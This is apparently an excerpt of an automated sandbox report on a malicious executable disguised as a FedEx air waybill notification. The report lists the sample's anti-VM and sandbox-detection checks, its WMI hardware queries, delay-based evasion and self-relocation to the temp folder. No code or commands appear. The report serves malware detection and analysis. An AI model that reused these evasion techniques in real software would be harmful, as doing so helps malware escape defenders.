                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_00DB9361 push ds; retf
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.88525497927
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile created: \fedex shipment notification - air waybill fed1007990_a10792.exe
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile created: \fedex shipment notification - air waybill fed1007990_a10792.exe

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Moves itself to temp directoryShow sources
                      Source: c:\users\user\desktop\fedex shipment notification - air waybill fed1007990_a10792.exeFile moved: C:\Users\user\AppData\Local\Temp\tmpG721.tmpJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.2f09098.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.2f9c210.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5244, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -240000s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239889s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 6036Thread sleep count: 1650 > 30
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 5028Thread sleep time: -40928s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 6036Thread sleep count: 439 > 30
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239781s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239671s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239543s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239420s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239309s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239195s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239063s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -238937s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -238813s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -238671s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -238562s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -238453s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -238344s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -238063s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -237313s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -237063s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -236313s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -236171s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -236060s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -235953s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 5320Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1632Thread sleep time: -15679732462653109s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1004Thread sleep count: 8137 > 30
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1004Thread sleep count: 1718 > 30
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 240000
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239889
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239781
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239671
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239543
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239420
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239309
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239195
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239063
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238937
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238813
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238671
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238562
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238453
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238344
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238063
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 237313
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 237063
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 236313
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 236171
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 236060
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 235953
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWindow / User API: threadDelayed 1650
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWindow / User API: threadDelayed 439
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWindow / User API: threadDelayed 8137
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWindow / User API: threadDelayed 1718
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 240000
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239889
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 40928
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239781
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239671
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239543
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239420
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239309
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239195
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239063
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238937
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238813
